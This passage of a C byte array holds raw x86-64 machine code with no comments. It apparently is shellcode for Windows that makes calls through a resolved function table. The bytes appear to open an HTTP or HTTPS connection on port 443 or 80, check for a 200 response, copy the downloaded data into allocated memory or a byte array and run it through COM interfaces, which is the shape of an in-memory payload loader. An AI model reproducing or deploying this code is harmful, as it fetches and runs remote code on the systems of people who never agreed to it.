86 0xe8, 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b,
87 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, 0x49, 0x89, 0xd0,
88 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6b, 0x35, 0x00,
89 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55,
90 0xe8, 0x48, 0x8b, 0x8a, 0x48, 0x07, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0,
91 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45,
92 0xe8, 0x48, 0xc7, 0x80, 0x48, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
93 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xe8,
94 0x49, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
95 0x20, 0x35, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x8b, 0x45, 0xd0,
96 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff,
97 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00,
98 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x03, 0x00, 0x00, 0x48,
99 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x90, 0x02,
100 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
101 0xc7, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85,
102 0x74, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x78, 0x02,
103 0x00, 0x00, 0x00, 0x02, 0x60, 0x84, 0x48, 0x8d, 0x85, 0xc0, 0x01, 0x00,
104 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
105 0x48, 0x89, 0xc1, 0xe8, 0xa4, 0x34, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x01,
106 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00,
107 0x00, 0x48, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0,
108 0x48, 0x89, 0x85, 0x08, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x01, 0x00,
109 0x00, 0x00, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x00,
110 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
111 0x80, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00,
112 0x48, 0x8d, 0x8a, 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01,
113 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba,
114 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00,
115 0x00, 0x00, 0x00, 0xe9, 0x5a, 0x04, 0x00, 0x00, 0x8b, 0x85, 0xd4, 0x01,
116 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89,
117 0x85, 0x74, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00,
118 0x74, 0x0a, 0x81, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x00, 0x30, 0x80, 0x00,
119 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd0, 0x00,
120 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9,
121 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00,
122 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
123 0x85, 0x68, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x68, 0x02, 0x00, 0x00,
124 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe9, 0x03, 0x00,
125 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd8,
126 0x00, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00, 0x74, 0x08,
127 0x41, 0xb8, 0xbb, 0x01, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xb8, 0x50, 0x00,
128 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d,
129 0x68, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00,
130 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
131 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
132 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
133 0x85, 0x60, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x02, 0x00, 0x00,
134 0x00, 0x0f, 0x84, 0xb1, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
135 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
136 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x92, 0x10, 0x06, 0x00, 0x00, 0x4c,
137 0x8d, 0x45, 0xc0, 0x48, 0x8b, 0x8d, 0x60, 0x02, 0x00, 0x00, 0x48, 0xc7,
138 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x78, 0x02, 0x00,
139 0x00, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
140 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
141 0xb9, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x89, 0xd2, 0xff, 0xd0, 0x48, 0x89,
142 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x58, 0x02, 0x00, 0x00,
143 0x00, 0x0f, 0x84, 0x2b, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00,
144 0x00, 0x00, 0x74, 0x4f, 0x8b, 0x85, 0x78, 0x02, 0x00, 0x00, 0x25, 0x00,
145 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x40, 0xc7, 0x85, 0x54, 0x02, 0x00,
146 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x02, 0x00, 0x00, 0x80,
147 0x33, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
148 0x80, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x3c, 0x02, 0x00, 0x00,
149 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00,
150 0x00, 0x49, 0x89, 0xd0, 0xba, 0x1f, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
151 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x01, 0x00,
152 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
153 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
154 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
155 0xc0, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00,
156 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00,
157 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
158 0x80, 0x08, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x34, 0x02, 0x00, 0x00,
159 0x48, 0x8d, 0x95, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02,
160 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d,
161 0x89, 0xc1, 0x49, 0x89, 0xd0, 0xba, 0x13, 0x00, 0x00, 0x20, 0xff, 0xd0,
162 0x85, 0xc0, 0x0f, 0x84, 0x2c, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x30, 0x02,
163 0x00, 0x00, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x1b, 0x01, 0x00,
164 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48,
165 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x40, 0x07, 0x00,
166 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00,
167 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02,
168 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x40, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x95,
169 0x34, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x48,
170 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd1, 0xba,
171 0x05, 0x00, 0x00, 0x20, 0xff, 0xd0, 0x85, 0xc0, 0x0f, 0x84, 0xba, 0x00,
172 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
173 0x40, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00,
174 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48,
175 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07,
176 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
177 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
178 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x89, 0x90, 0x48, 0x07,
179 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
180 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x53, 0xc7, 0x85, 0x38,
181 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
182 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
183 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x41,
184 0x89, 0xd2, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92,
185 0x48, 0x07, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x38, 0x02, 0x00, 0x00, 0x48,
186 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x45, 0x89, 0xd0,
187 0xff, 0xd0, 0x89, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
188 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b,
189 0x95, 0x58, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
190 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00,
191 0x48, 0x8b, 0x95, 0x60, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
192 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00,
193 0x00, 0x00, 0x48, 0x8b, 0x95, 0x68, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1,
194 0xff, 0xd0, 0x83, 0xbd, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x99,
195 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
196 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x48, 0x02, 0x00, 0x00,
197 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x80, 0x40, 0x07,
198 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90,
199 0x30, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48,
200 0x05, 0x20, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x48, 0x02, 0x00, 0x00,
201 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x35,
202 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
203 0x28, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
204 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xca, 0x31, 0x00, 0x00, 0x48,
205 0x89, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48, 0x02, 0x00,
206 0x00, 0x48, 0x8b, 0x80, 0x08, 0x19, 0x00, 0x00, 0x48, 0x3b, 0x85, 0x40,
207 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x06,
208 0x8b, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x00, 0x03, 0x00,
209 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48,
210 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xf4, 0x00, 0x00,
211 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
212 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x10,
213 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89,
214 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x48,
215 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48,
216 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xf7,
217 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x18, 0x01,
218 0x00, 0x00, 0x4c, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81,
219 0xc2, 0x2c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
220 0x1c, 0x04, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4,
221 0x00, 0x0f, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48,
222 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x55,
223 0x18, 0x4c, 0x8d, 0x4a, 0x08, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
224 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x4c, 0x8d, 0x52, 0x04,
225 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x0a, 0x4c, 0x89, 0xd2, 0xff, 0xd0,
226 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x6c, 0x48, 0x8b, 0x45,
227 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50,
228 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x48, 0x8d, 0x55, 0xc4,
229 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x5f, 0x8b,
230 0x45, 0xc4, 0x85, 0xc0, 0x74, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
231 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55,
232 0x18, 0x4c, 0x8d, 0x4a, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
233 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x92, 0x4c,
234 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c,
235 0x89, 0xd2, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0xeb, 0x19, 0x48, 0x8b, 0x45,
236 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0b, 0x48,
237 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d,
238 0xf4, 0x00, 0x79, 0x43, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x10,
239 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x83, 0xc2, 0x10, 0x48,
240 0x8b, 0x4d, 0x10, 0x4c, 0x8d, 0x81, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b,
241 0x4d, 0x10, 0x48, 0x81, 0xc1, 0x4c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54,
242 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00,
243 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
244 0x7d, 0xf4, 0x00, 0x79, 0x16, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
245 0x10, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x02,
246 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
247 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b,
248 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
249 0xf4, 0x00, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
250 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x48,
251 0x81, 0xc2, 0x04, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
252 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
253 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
254 0x42, 0x18, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x10, 0x48, 0x8b,
255 0x55, 0xe0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff,
256 0xd0, 0x89, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xb8,
257 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0,
258 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b,
259 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00,
260 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, 0x42, 0x20, 0x48, 0x8b, 0x55, 0x10,
261 0x4c, 0x8d, 0x8a, 0x6c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48,
262 0x8b, 0x4a, 0x18, 0x4c, 0x89, 0xca, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
263 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x2d, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xcc,
264 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10,
265 0x19, 0x00, 0x00, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
266 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc8, 0x49, 0x89, 0xd0,
267 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0,
268 0x48, 0x89, 0x45, 0xd8, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x0f, 0x84, 0xeb,
269 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
270 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x20,
271 0x8b, 0x55, 0xf0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48,
272 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19,
273 0x00, 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48,
274 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39,
275 0xc2, 0x72, 0xcd, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
276 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55,
277 0x18, 0x4c, 0x8d, 0x42, 0x28, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a,
278 0x20, 0x48, 0x8b, 0x55, 0xd8, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
279 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xec, 0xc7,
280 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b,
281 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x2f, 0x8b, 0x55, 0xf0, 0x48,
282 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8b, 0x55, 0xf8, 0x8b,
283 0x45, 0xf0, 0xc6, 0x84, 0x02, 0x18, 0x19, 0x00, 0x00, 0x00, 0x48, 0x8b,
284 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19, 0x00,
285 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48, 0x8b,
286 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39, 0xc2,
287 0x72, 0xbe, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
288 0x00, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x8b, 0x45,
289 0xec, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec,
290 0x48, 0x01, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
291 0x48, 0x89, 0x8d, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0xe8, 0x00,
292 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
293 0x00, 0x48, 0xc7, 0x85, 0x88, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
294 0x48, 0xc7, 0x45, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x18,
295 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x20, 0x00, 0x00, 0x00, 0x00,
296 0x66, 0xc7, 0x45, 0xea, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
297 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
298 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
299 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
300 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
301 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00,
302 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x1f, 0x03, 0x00,
303 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28,
304 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b,
305 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x38, 0x48, 0x8b, 0x95,
306 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x4c, 0x89, 0xc2, 0xff,
307 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
308 0x00, 0x00, 0x0f, 0x88, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
309 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b,
310 0x80, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
311 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8d, 0x95, 0x88, 0x00, 0x00, 0x00, 0xff,
312 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
313 0x00, 0x00, 0x0f, 0x88, 0x49, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
314 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b,
315 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0,
